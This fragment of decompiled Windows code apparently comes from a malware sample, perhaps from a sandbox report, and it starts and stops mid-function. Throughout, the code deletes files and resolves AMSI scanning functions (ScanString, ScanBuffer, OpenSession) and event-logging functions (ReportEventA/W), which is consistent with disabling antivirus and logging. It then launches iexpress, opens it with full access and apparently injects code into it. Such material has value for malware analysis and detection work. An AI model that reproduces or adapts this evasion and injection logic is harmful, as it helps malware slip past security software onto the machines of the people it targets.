                                                                					_t1521 =  *0x256da54; // 0x0
                                                                					E02514A98(_t1988 - 0x5f8, E02514D64(_t1521));
                                                                					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x5f8));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1529 =  *0x256da58; // 0x0
                                                                					E02514A98(_t1988 - 0x5fc, E02514D64(_t1529));
                                                                					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x5fc));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1537 =  *0x256dcd4; // 0x0
                                                                					E02514A98(_t1988 - 0x600, E02514D64(_t1537));
                                                                					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x600));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1545 =  *0x256d8ec; // 0x0
                                                                					E02514A98(_t1988 - 0x604, E02514D64(_t1545));
                                                                					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x604));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
                                                                					asm("sbb eax, eax");
                                                                					_t1553 =  *0x256d8e8; // 0x0
                                                                					E02514A98(_t1988 - 0x608, E02514D64(_t1553));
                                                                					_t1561 =  *((intOrPtr*)(_t1988 - 0x608));
                                                                					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x608));
                                                                					_t1996 = DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230)))) - 1;
                                                                					asm("sbb eax, eax");
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("Initialize");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x6a4, E02514D64( *((intOrPtr*)(_t1988 - 0x6a8))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x6a4)));
                                                                				_t1569 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x6b0, _t1569, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x6ac, E02514D64( *((intOrPtr*)(_t1988 - 0x6b0))));
                                                                				_pop(_t1617); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x6ac)), _t1561, _t1617, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x6b4, E02514D64( *((intOrPtr*)(_t1988 - 0x6b8))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x6b4)));
                                                                				_t1570 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x6c0, _t1570, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x6bc, E02514D64( *((intOrPtr*)(_t1988 - 0x6c0))));
                                                                				_pop(_t1622); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x6bc)), _t1561, _t1622, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x6c4, E02514D64( *((intOrPtr*)(_t1988 - 0x6c8))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x6c4)));
                                                                				_t1571 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x6d0, _t1571, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x6cc, E02514D64( *((intOrPtr*)(_t1988 - 0x6d0))));
                                                                				_pop(_t1627); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x6cc)), _t1561, _t1627, _t1987); // executed
                                                                				_t1628 =  *0x256dd00; // 0x2a1f418
                                                                				_t611 =  *0x256da80; // 0x7f190018, executed
                                                                				E02525580(_t611, _t1561, _t1988 - 0x6d4, _t1628, _t1986, _t1987); // executed
                                                                				E025148F4(0x256da48,  *((intOrPtr*)(_t1988 - 0x6d4)));
                                                                				_t615 =  *0x256dcf0; // 0x2a51bb8
                                                                				_t616 = E02517DA0(_t615, _t1996);
                                                                				_t1573 = _t1988 - 0x6d8;
                                                                				_t617 =  *0x256da48; // 0x7f210018
                                                                				E02525B34(_t617, _t1561, _t1988 - 0x6d8, _t616, _t1987);
                                                                				E025148F4(0x256da4c,  *((intOrPtr*)(_t1988 - 0x6d8)));
                                                                				_t621 =  *0x256da4c; // 0x7f110018
                                                                				E02525AC0(_t621, _t1561, _t1988 - 0x6d8, _t1988 - 0x6e0, _t1986, _t1987);
                                                                				E02525910( *((intOrPtr*)(_t1988 - 0x6e0)), _t1573, _t1988 - 0x6dc);
                                                                				E025148F4(0x256da84,  *((intOrPtr*)(_t1988 - 0x6dc)));
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("Initialize");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x6e4, E02514D64( *((intOrPtr*)(_t1988 - 0x6e8))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x6e4)));
                                                                				_t1574 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x6f0, _t1574, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x6ec, E02514D64( *((intOrPtr*)(_t1988 - 0x6f0))));
                                                                				_pop(_t1639); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x6ec)), _t1561, _t1639, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x6f4, E02514D64( *((intOrPtr*)(_t1988 - 0x6f8))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x6f4)));
                                                                				_t1575 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x700, _t1575, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x6fc, E02514D64( *((intOrPtr*)(_t1988 - 0x700))));
                                                                				_pop(_t1644); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x6fc)), _t1561, _t1644, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("UacScan");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x704, E02514D64( *((intOrPtr*)(_t1988 - 0x708))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x704)));
                                                                				_t1576 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x710, _t1576, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x70c, E02514D64( *((intOrPtr*)(_t1988 - 0x710))));
                                                                				_pop(_t1649); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x70c)), _t1561, _t1649, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("UacInitialize");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x714, E02514D64( *((intOrPtr*)(_t1988 - 0x718))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x714)));
                                                                				_t1577 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x720, _t1577, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x71c, E02514D64( *((intOrPtr*)(_t1988 - 0x720))));
                                                                				_pop(_t1654); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x71c)), _t1561, _t1654, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x724, E02514D64( *((intOrPtr*)(_t1988 - 0x728))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x724)));
                                                                				_t1578 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x730, _t1578, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x72c, E02514D64( *((intOrPtr*)(_t1988 - 0x730))));
                                                                				_pop(_t1659); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x72c)), _t1561, _t1659, _t1987);
                                                                				_t697 =  *0x256dcec; // 0x0
                                                                				E02514CB0(_t697, 0x252ae54);
                                                                				if(_t1996 == 0) {
                                                                					_t1395 =  *0x256dce4; // 0x2a51b88
                                                                					E02514CB0(_t1395, 0x252ae54);
                                                                					if(_t1996 != 0) {
                                                                						_t1397 =  *0x256dce8; // 0x0
                                                                						E02514CB0(_t1397, 0x252ae54);
                                                                						if(_t1996 != 0) {
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanBuffer");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x734, E02514D64( *((intOrPtr*)(_t1988 - 0x738))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x734)));
                                                                							_t1600 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x740, _t1600, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x73c, E02514D64( *((intOrPtr*)(_t1988 - 0x740))));
                                                                							_pop(_t1943);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x73c)), _t1561, _t1943, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x744, E02514D64( *((intOrPtr*)(_t1988 - 0x748))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x744)));
                                                                							_t1601 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x750, _t1601, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x74c, E02514D64( *((intOrPtr*)(_t1988 - 0x750))));
                                                                							_pop(_t1948);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x74c)), _t1561, _t1948, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push(0x252b020);
                                                                							_push(0);
                                                                							_push(0x252b02c);
                                                                							_push(0);
                                                                							_push(0x252b038);
                                                                							_push(0);
                                                                							_push(0x252b044);
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x754, E02514D64( *((intOrPtr*)(_t1988 - 0x758))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x754)));
                                                                							_t1602 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x760, _t1602, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x75c, E02514D64( *((intOrPtr*)(_t1988 - 0x760))));
                                                                							_pop(_t1953);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x75c)), _t1561, _t1953, _t1987);
                                                                							E02514A98(_t1988 - 0x764, "ReportEventA");
                                                                							_push( *((intOrPtr*)(_t1988 - 0x764)));
                                                                							E02514A98(_t1988 - 0x768, "advapi32");
                                                                							_pop(_t1956);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x768)), _t1561, _t1956, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x76c, E02514D64( *((intOrPtr*)(_t1988 - 0x770))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x76c)));
                                                                							_t1603 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x778, _t1603, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x774, E02514D64( *((intOrPtr*)(_t1988 - 0x778))));
                                                                							_pop(_t1961);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x774)), _t1561, _t1961, _t1987);
                                                                							E02514A98(_t1988 - 0x77c, "SystemFunction035");
                                                                							_push( *((intOrPtr*)(_t1988 - 0x77c)));
                                                                							E02514A98(_t1988 - 0x780, "advapi32");
                                                                							_pop(_t1964);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x780)), _t1561, _t1964, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x784, E02514D64( *((intOrPtr*)(_t1988 - 0x788))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x784)));
                                                                							_t1604 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x790, _t1604, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x78c, E02514D64( *((intOrPtr*)(_t1988 - 0x790))));
                                                                							_pop(_t1969);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x78c)), _t1561, _t1969, _t1987);
                                                                							E02514A98(_t1988 - 0x794, "ReportEventW");
                                                                							_push( *((intOrPtr*)(_t1988 - 0x794)));
                                                                							E02514A98(_t1988 - 0x798, "advapi32");
                                                                							_pop(_t1972);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x798)), _t1561, _t1972, _t1987);
                                                                							E02524F34(E02514DBC(0x256da84), _t1561, _t1604, _t1986, _t1987, _t1999);
                                                                						}
                                                                					}
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x79c, E02514D64( *((intOrPtr*)(_t1988 - 0x7a0))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x79c)));
                                                                				_t1579 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x7a8, _t1579, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x7a4, E02514D64( *((intOrPtr*)(_t1988 - 0x7a8))));
                                                                				_pop(_t1665); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x7a4)), _t1561, _t1665, _t1987);
                                                                				_t713 =  *0x256dce8; // 0x0
                                                                				E02514CB0(_t713, 0x252ae54);
                                                                				if(_t1996 == 0) {
                                                                					_t1262 =  *0x256dce4; // 0x2a51b88
                                                                					E02514CB0(_t1262, 0x252ae54);
                                                                					if(_t1996 != 0) {
                                                                						_t1264 =  *0x256dcec; // 0x0
                                                                						E02514CB0(_t1264, 0x252ae54);
                                                                						if(_t1996 != 0) {
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanBuffer");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x7ac, E02514D64( *((intOrPtr*)(_t1988 - 0x7b0))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x7ac)));
                                                                							_t1593 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x7b8, _t1593, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x7b4, E02514D64( *((intOrPtr*)(_t1988 - 0x7b8))));
                                                                							_pop(_t1896);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x7b4)), _t1561, _t1896, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x7bc, E02514D64( *((intOrPtr*)(_t1988 - 0x7c0))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x7bc)));
                                                                							_t1594 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x7c8, _t1594, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x7c4, E02514D64( *((intOrPtr*)(_t1988 - 0x7c8))));
                                                                							_pop(_t1901);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x7c4)), _t1561, _t1901, _t1987);
                                                                							WinExec("iexpress", 0);
                                                                							 *0x256da9c = E025245F8("iexpress.exe");
                                                                							_t1297 =  *0x256da9c; // 0x0
                                                                							 *0x256daa0 = OpenProcess(0x1f0fff, 0xffffffff, _t1297);
                                                                							_t1299 =  *0x256daa0; // 0x0
                                                                							_push(_t1299);
                                                                							L025237E0();
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x7cc, E02514D64( *((intOrPtr*)(_t1988 - 0x7d0))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x7cc)));
                                                                							_t1595 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x7d8, _t1595, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x7d4, E02514D64( *((intOrPtr*)(_t1988 - 0x7d8))));
                                                                							_pop(_t1906);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x7d4)), _t1561, _t1906, _t1987);
                                                                							_t1315 = E02514DBC(0x256da84);
                                                                							_t1316 =  *0x256daa0; // 0x0
                                                                							E02523F94(_t1316, _t1561, _t1315, _t1986, _t1987, _t1999);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x7dc, E02514D64( *((intOrPtr*)(_t1988 - 0x7e0))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x7dc)));
                                                                							_t1596 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x7e8, _t1596, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x7e4, E02514D64( *((intOrPtr*)(_t1988 - 0x7e8))));
                                                                							_pop(_t1912);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x7e4)), _t1561, _t1912, _t1987);
                                                                							E02514A98(_t1988 - 0x7ec, "ReportEventA");
                                                                							_push( *((intOrPtr*)(_t1988 - 0x7ec)));
                                                                							E02514A98(_t1988 - 0x7f0, "advapi32");
                                                                							_pop(_t1915);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x7f0)), _t1561, _t1915, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x7f4, E02514D64( *((intOrPtr*)(_t1988 - 0x7f8))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x7f4)));
                                                                							_t1597 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x800, _t1597, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x7fc, E02514D64( *((intOrPtr*)(_t1988 - 0x800))));
                                                                							_pop(_t1920);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x7fc)), _t1561, _t1920, _t1987);
                                                                							E02514A98(_t1988 - 0x804, "SystemFunction035");
                                                                							_push( *((intOrPtr*)(_t1988 - 0x804)));
                                                                							E02514A98(_t1988 - 0x808, "advapi32");
                                                                							_pop(_t1923);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x808)), _t1561, _t1923, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x80c, E02514D64( *((intOrPtr*)(_t1988 - 0x810))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x80c)));
                                                                							_t1598 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x818, _t1598, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x814, E02514D64( *((intOrPtr*)(_t1988 - 0x818))));
                                                                							_pop(_t1928);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x814)), _t1561, _t1928, _t1987);
                                                                							E02514A98(_t1988 - 0x81c, "ReportEventW");
                                                                							_push( *((intOrPtr*)(_t1988 - 0x81c)));
                                                                							E02514A98(_t1988 - 0x820, "advapi32");
                                                                							_pop(_t1931);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x820)), _t1561, _t1931, _t1987);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x824, E02514D64( *((intOrPtr*)(_t1988 - 0x828))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x824)));
                                                                							_t1599 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x830, _t1599, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x82c, E02514D64( *((intOrPtr*)(_t1988 - 0x830))));
                                                                							_pop(_t1936);
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x82c)), _t1561, _t1936, _t1987);
                                                                						}
                                                                					}
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x834, E02514D64( *((intOrPtr*)(_t1988 - 0x838))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x834)));
                                                                				_t1580 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x840, _t1580, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x83c, E02514D64( *((intOrPtr*)(_t1988 - 0x840))));
                                                                				_pop(_t1671); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x83c)), _t1561, _t1671, _t1987);
                                                                				_t729 =  *0x256dce4; // 0x2a51b88
                                                                				E02514CB0(_t729, 0x252ae54);
                                                                				if(_t1996 == 0) {
                                                                					_t1223 =  *0x256dce8; // 0x0
                                                                					E02514CB0(_t1223, 0x252ae54);
                                                                					if(_t1996 != 0) {
                                                                						_t1225 =  *0x256dcec; // 0x0
                                                                						E02514CB0(_t1225, 0x252ae54);
                                                                						if(_t1996 != 0) {
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanBuffer");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x844, E02514D64( *((intOrPtr*)(_t1988 - 0x848))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x844)));
                                                                							_t1591 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x850, _t1591, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x84c, E02514D64( *((intOrPtr*)(_t1988 - 0x850))));
                                                                							_pop(_t1882); // executed
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x84c)), _t1561, _t1882, _t1987); // executed
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t1988 - 0x854, E02514D64( *((intOrPtr*)(_t1988 - 0x858))));
                                                                							_push( *((intOrPtr*)(_t1988 - 0x854)));
                                                                							_t1592 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t1988 - 0x860, _t1592, 0x252ad5c);
                                                                							E02514A98(_t1988 - 0x85c, E02514D64( *((intOrPtr*)(_t1988 - 0x860))));
                                                                							_pop(_t1887); // executed
                                                                							E025236CC( *((intOrPtr*)(_t1988 - 0x85c)), _t1561, _t1887, _t1987); // executed
                                                                							E02512FC4(0, _t1988 - 0x864);
                                                                							_push( *((intOrPtr*)(_t1988 - 0x864)));
                                                                							_t1259 = E02514DBC(0x256da84);
                                                                							_pop(_t1260); // executed
                                                                							E025248A4(_t1260, _t1561, _t1259, _t1987, _t1999); // executed
                                                                						}
                                                                					}
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push(0x252b020);
                                                                				_push(0);
                                                                				_push(0x252b02c);
                                                                				_push(0);
                                                                				_push(0x252b038);
                                                                				_push(0);
                                                                				_push(0x252b044);
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x868, E02514D64( *((intOrPtr*)(_t1988 - 0x86c))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x868)));
                                                                				_t1581 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x874, _t1581, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x870, E02514D64( *((intOrPtr*)(_t1988 - 0x874))));
                                                                				_pop(_t1677); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x870)), _t1561, _t1677, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x878, "ReportEventA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x878)));
                                                                				E02514A98(_t1988 - 0x87c, "advapi32");
                                                                				_pop(_t1680); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x87c)), _t1561, _t1680, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x880, E02514D64( *((intOrPtr*)(_t1988 - 0x884))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x880)));
                                                                				_t1582 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x88c, _t1582, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x888, E02514D64( *((intOrPtr*)(_t1988 - 0x88c))));
                                                                				_pop(_t1685); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x888)), _t1561, _t1685, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x890, "SystemFunction035");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x890)));
                                                                				E02514A98(_t1988 - 0x894, "advapi32");
                                                                				_pop(_t1688); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x894)), _t1561, _t1688, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x898, E02514D64( *((intOrPtr*)(_t1988 - 0x89c))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x898)));
                                                                				_t1583 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x8a4, _t1583, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x8a0, E02514D64( *((intOrPtr*)(_t1988 - 0x8a4))));
                                                                				_pop(_t1693); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8a0)), _t1561, _t1693, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x8a8, "ReportEventW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8a8)));
                                                                				E02514A98(_t1988 - 0x8ac, "advapi32");
                                                                				_pop(_t1696); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8ac)), _t1561, _t1696, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x8b0, E02514D64( *((intOrPtr*)(_t1988 - 0x8b4))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8b0)));
                                                                				_t1584 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x8bc, _t1584, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x8b8, E02514D64( *((intOrPtr*)(_t1988 - 0x8bc))));
                                                                				_pop(_t1701); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8b8)), _t1561, _t1701, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x8c0, "ShellExecuteExA");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8c0)));
                                                                				E02514A98(_t1988 - 0x8c4, "shell32");
                                                                				_pop(_t1704); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8c4)), _t1561, _t1704, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x8c8, "SuspendThread");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8c8)));
                                                                				E02514A98(_t1988 - 0x8cc, "kernel32");
                                                                				_pop(_t1707);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8cc)), _t1561, _t1707, _t1987);
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x8d0, E02514D64( *((intOrPtr*)(_t1988 - 0x8d4))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8d0)));
                                                                				_t1585 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x8dc, _t1585, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x8d8, E02514D64( *((intOrPtr*)(_t1988 - 0x8dc))));
                                                                				_pop(_t1712); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8d8)), _t1561, _t1712, _t1987); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("Initialize");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x8e0, E02514D64( *((intOrPtr*)(_t1988 - 0x8e4))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8e0)));
                                                                				_t1586 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x8ec, _t1586, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x8e8, E02514D64( *((intOrPtr*)(_t1988 - 0x8ec))));
                                                                				_pop(_t1717); // executed
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x8e8)), _t1561, _t1717, _t1987); // executed
                                                                				E02514A98(_t1988 - 0x8f0, "WmiReceiveNotificationsW");
                                                                				_push( *((intOrPtr*)(_t1988 - 0x8f0)));
                                                                				E02514A98(_t1988 - 0x8f4, "advapi32");
                                                                				_pop(_t1720); // executed
